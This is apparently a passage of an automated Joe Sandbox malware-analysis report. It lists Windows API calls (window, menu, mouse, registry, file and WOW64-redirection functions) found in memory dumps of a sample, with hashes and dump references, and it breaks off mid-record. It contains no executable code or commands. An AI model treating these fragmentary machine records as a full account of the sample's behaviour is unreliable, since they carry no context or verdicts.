                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00DBFB8F,00000000,?,?,00000000,?,00DA39BC,00000004,00000000,00000000), ref: 00DF8BAB
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00DF8BD1
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00DF8C30
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00DF8C44
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00DF8C6A
                                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00DF8C8E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 642888154-0
                                                                                              • Opcode ID: 6ff6ea2ccfba76e22284e6bd46b6a1ffbbc523a43b1a8c72e1b05ef053007b35
                                                                                              • Instruction ID: a08789d0bd974f181af6cc86a7aea4d93c7cacb525aab71f60b78b3c3e8b2883
                                                                                              • Opcode Fuzzy Hash: 6ff6ea2ccfba76e22284e6bd46b6a1ffbbc523a43b1a8c72e1b05ef053007b35
                                                                                              • Instruction Fuzzy Hash: 7C41837460124CEFDB15CF14D889BB57BE1FB45304F1A8169E7489F2A2CB31A845DB72
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00DE2C45
                                                                                                • Part of subcall function 00DDEE49: GetWindowRect.USER32(?,?), ref: 00DDEE61
                                                                                              • GetDesktopWindow.USER32 ref: 00DE2C6F
                                                                                              • GetWindowRect.USER32(00000000), ref: 00DE2C76
                                                                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DE2CB2
                                                                                              • GetCursorPos.USER32(?), ref: 00DE2CDE
                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DE2D3C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                              • String ID:
                                                                                              • API String ID: 2387181109-0
                                                                                              • Opcode ID: 105f14d6f846eeab76b5116b6e77954e13deff02fa0e12b8610839680fa3ce6c
                                                                                              • Instruction ID: 330b94fbdcdad930171433aa4c4160a51ca7fad68066631cf5fe3ca101fe2857
                                                                                              • Opcode Fuzzy Hash: 105f14d6f846eeab76b5116b6e77954e13deff02fa0e12b8610839680fa3ce6c
                                                                                              • Instruction Fuzzy Hash: C431DE72504356ABD720EF15C845FAEB7AAFBC4314F14091AF489D7280CB30EA08CBA2
                                                                                              APIs
                                                                                                • Part of subcall function 00D6557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D65558,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D6559E
                                                                                              • _wcslen.LIBCMT ref: 00DD61D5
                                                                                              • CoInitialize.OLE32(00000000), ref: 00DD62EF
                                                                                              • CoCreateInstance.OLE32(00E00CC4,00000000,00000001,00E00B34,?), ref: 00DD6308
                                                                                              • CoUninitialize.OLE32 ref: 00DD6326
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 3172280962-24824748
                                                                                              • Opcode ID: af3bfcd94fd7c3d74b3f69f7c69f4aa4462446e28c17252b466040c3eeac41c6
                                                                                              • Instruction ID: e685bd9eb6045514c904e3c0db6005c185ce20d130ab9d5adeab3f83ffb108e2
                                                                                              • Opcode Fuzzy Hash: af3bfcd94fd7c3d74b3f69f7c69f4aa4462446e28c17252b466040c3eeac41c6
                                                                                              • Instruction Fuzzy Hash: 26D134756083119FC714DF24C484A2ABBE5FF89714F18895EF8869B361DB32EC45CBA2
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DC210F
                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00DC211B
                                                                                              • CloseHandle.KERNEL32(?), ref: 00DC2124
                                                                                              • CloseHandle.KERNEL32(?), ref: 00DC212C
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DC2135
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00DC213C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                              • String ID:
                                                                                              • API String ID: 146765662-0
                                                                                              • Opcode ID: aa228b9bbec36f6ac89f928699f9590624e298fc98137223be23c04b045a2dca
                                                                                              • Instruction ID: ea9fdbbff13ee4ac81a5097054c516675eb8021e87b77dc8435d2d6ca377c776
                                                                                              • Opcode Fuzzy Hash: aa228b9bbec36f6ac89f928699f9590624e298fc98137223be23c04b045a2dca
                                                                                              • Instruction Fuzzy Hash: 69E0E576004301BBDB012FA1ED0CD1ABF7BFF59322B108220F225C2270CB329420DB60
                                                                                              APIs
                                                                                                • Part of subcall function 00D64154: _wcslen.LIBCMT ref: 00D64159
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DCCEAE
                                                                                              • _wcslen.LIBCMT ref: 00DCCEF5
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DCCF5C
                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DCCF8A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info_wcslen$Default
                                                                                              • String ID: 0
                                                                                              • API String ID: 1227352736-4108050209
                                                                                              • Opcode ID: 02bec9fa1b5b34937fd0e80b949227b856b6ef0e2357f14524f34dc682b30fcf
                                                                                              • Instruction ID: c03998add804368c99b527f740054768a0e713097387d46675d04c18c10b7459
                                                                                              • Opcode Fuzzy Hash: 02bec9fa1b5b34937fd0e80b949227b856b6ef0e2357f14524f34dc682b30fcf
                                                                                              • Instruction Fuzzy Hash: 0951A0716253029BD714DF28C845F6BBBE9EF8A314F081A2DFA99D7290D760C944C772
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DF4794
                                                                                              • IsMenu.USER32(?), ref: 00DF47A9
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DF47F1
                                                                                              • DrawMenuBar.USER32 ref: 00DF4804
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$DrawInfoInsert
                                                                                              • String ID: 0
                                                                                              • API String ID: 3076010158-4108050209
                                                                                              • Opcode ID: 9065532aafc1132dfa18d6bf358abb884cca6b194bab34e5b651595f20573874
                                                                                              • Instruction ID: 0567cbc4d7188d8d0a8c2691fb76c82f6e4d0c9f85103668fbda5766e1bea12c
                                                                                              • Opcode Fuzzy Hash: 9065532aafc1132dfa18d6bf358abb884cca6b194bab34e5b651595f20573874
                                                                                              • Instruction Fuzzy Hash: B9412574A0124DAFDB20DF64D884ABBBBB9FF45354F098129EA45AB350C730ED54CBA0
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00DC26F6
                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00DC2709
                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00DC2739
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_wcslen$ClassName
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 2081771294-1403004172
                                                                                              • Opcode ID: b15f23a6db15962d9f0ecb614da3b4b762128632ffc73df2c1609bc69defd633
                                                                                              • Instruction ID: f4916490c373c94b48c6633c0b82b2a223fbc3a101c5167246ef01bfe0046057
                                                                                              • Opcode Fuzzy Hash: b15f23a6db15962d9f0ecb614da3b4b762128632ffc73df2c1609bc69defd633
                                                                                              • Instruction Fuzzy Hash: 9821F371900209BFDB14ABA0DC85DFFBBB9DF45760B14411DF522A72E1CB38494A9630
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D6637F,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D6633E
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D66350
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00D6637F,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D66362
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 145871493-3689287502
                                                                                              • Opcode ID: 793565467288f3a288fa4096ae3c07ccf24fbfe8d270bce34315392ad9ad9d74
                                                                                              • Instruction ID: c6874ee58e7326c3bbfaaacac1b1289bbebb9137aa0980db9747e596270db3d2
                                                                                              • Opcode Fuzzy Hash: 793565467288f3a288fa4096ae3c07ccf24fbfe8d270bce34315392ad9ad9d74
                                                                                              • Instruction Fuzzy Hash: 94E08C32682B222B92222B15BC08A7E762BAF86B2270E4115FA00E2340DBB0CC01C4B1
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DA54C3,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D66304
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D66316
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00DA54C3,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D66329
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 145871493-1355242751
                                                                                              • Opcode ID: 0b46d2d9c955f259f6173431f06b65ee39edd401c65916c0632dd1f406257479
                                                                                              • Instruction ID: 549f862be7b4b609b576f86b716e4f52f2990bce2603b2b85883f349ad54095a
                                                                                              • Opcode Fuzzy Hash: 0b46d2d9c955f259f6173431f06b65ee39edd401c65916c0632dd1f406257479
                                                                                              • Instruction Fuzzy Hash: A8D012356427325742226F25BC189AE7E1BDFC9B1534D4015F900E6368CF60CD01C5B1
                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00DEAD86
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DEAD94
                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DEADC7
                                                                                              • CloseHandle.KERNEL32(?), ref: 00DEAF9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 3488606520-0
                                                                                              • Opcode ID: 263c51566b7516c2ebbce3b23ab04ec04e6dfdbbe3cfc79f9bb276c5c3438537
                                                                                              • Instruction ID: 29671cd7f6d2249c3aee902b1acfa16ca82bcff566718c718ead795d97d1c46f
                                                                                              • Opcode Fuzzy Hash: 263c51566b7516c2ebbce3b23ab04ec04e6dfdbbe3cfc79f9bb276c5c3438537
                                                                                              • Instruction Fuzzy Hash: 4FA19DB56043019FD720EF28C886B2AB7E5EF44714F14895DF5999B292EA70EC40CBA2
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DED2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DEC00D,?,?), ref: 00DED314
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED350
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED3C7
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED3FD
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DEC404
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DEC45F
                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DEC4C2
                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00DEC505
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DEC512
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                              • String ID:
                                                                                              • API String ID: 826366716-0
                                                                                              • Opcode ID: 232b294448edfcb6fd6fe8369e12a9963e3f870e44e7514588f18defee2afcad
                                                                                              • Instruction ID: 6941e2d3ed262a17f828cbd33adb6597ff74237c218c874193301191de446bb1
                                                                                              • Opcode Fuzzy Hash: 232b294448edfcb6fd6fe8369e12a9963e3f870e44e7514588f18defee2afcad
                                                                                              • Instruction Fuzzy Hash: 5C618031118281AFD714EF25C494E3ABBE5FF84308F14955DF4998B2A2DB31ED46CBA1
                                                                                              APIs
                                                                                                • Part of subcall function 00DCE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DCD6E2,?), ref: 00DCE629
                                                                                                • Part of subcall function 00DCE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DCD6E2,?), ref: 00DCE642
                                                                                                • Part of subcall function 00DCE9C5: GetFileAttributesW.KERNELBASE(?,00DCD755), ref: 00DCE9C6
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00DCEC9F
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00DCECD8
                                                                                              • _wcslen.LIBCMT ref: 00DCEE17
                                                                                              • _wcslen.LIBCMT ref: 00DCEE2F
                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00DCEE7C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3183298772-0
                                                                                              • Opcode ID: 047d073cf684f309df03381d6442297344db00cb7060ea27f8659b45085e2e77
                                                                                              • Instruction ID: 414367cde62ca6869887af0ac0f8c4afd7ff7e40865ba1edfdfddc2daa5158e0
                                                                                              • Opcode Fuzzy Hash: 047d073cf684f309df03381d6442297344db00cb7060ea27f8659b45085e2e77
                                                                                              • Instruction Fuzzy Hash: B5512FF20083465BC764EB54D881EDBB3EDEF85350F04492EF589D3151EE74A6888B76
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: e269b83c92910d9cf15a6f5991b38224e6ca8a3ab89046ddb9351211e01cfb13
                                                                                              • Instruction ID: 2830f3021ccd387021762d216fd0101b8aea2418c5c6b3d41534cc38ab01d24b
                                                                                              • Opcode Fuzzy Hash: e269b83c92910d9cf15a6f5991b38224e6ca8a3ab89046ddb9351211e01cfb13
                                                                                              • Instruction Fuzzy Hash: CD41D432A00204AFDF20DF78C881A6EB7E5EF89314F1941A8E515EB255D631ED01CBA0
                                                                                              APIs
                                                                                              • GetInputState.USER32 ref: 00DD4225
                                                                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00DD427C
                                                                                              • TranslateMessage.USER32(?), ref: 00DD42A5
                                                                                              • DispatchMessageW.USER32(?), ref: 00DD42AF
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DD42C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                              • String ID:
                                                                                              • API String ID: 2256411358-0
                                                                                              • Opcode ID: 644cbebc8b895065d4476b143d45bdb9ef06032847d6dc786f313a18375557a2
                                                                                              • Instruction ID: 2bd41e24075005500de891d4c7ed8ef423de8538a6a0bb2b69405393c75606a7
                                                                                              • Opcode Fuzzy Hash: 644cbebc8b895065d4476b143d45bdb9ef06032847d6dc786f313a18375557a2
                                                                                              • Instruction Fuzzy Hash: E03191705443469FEB34CB659849FBA3FA8EB11304F08056FE5A2D63A0E674A889CB35
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00DC21A5
                                                                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 00DC2251
                                                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 00DC2259
                                                                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 00DC226A
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00DC2272
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3382505437-0
                                                                                              • Opcode ID: 3d130f60350d236e3f0b9f34a459a465ea73ab1041dc2b5d94c7bba8f6c36850
                                                                                              • Instruction ID: 2be33062c965b4f4c21d2ec508741ed579fd022c9d2e6c9ac31217bea901fc5e
                                                                                              • Opcode Fuzzy Hash: 3d130f60350d236e3f0b9f34a459a465ea73ab1041dc2b5d94c7bba8f6c36850
                                                                                              • Instruction Fuzzy Hash: 0331907190021AEFDB14CFA8DD49BAE7BB6EB14315F148219F925E72D0C770A944CBA0
                                                                                              APIs
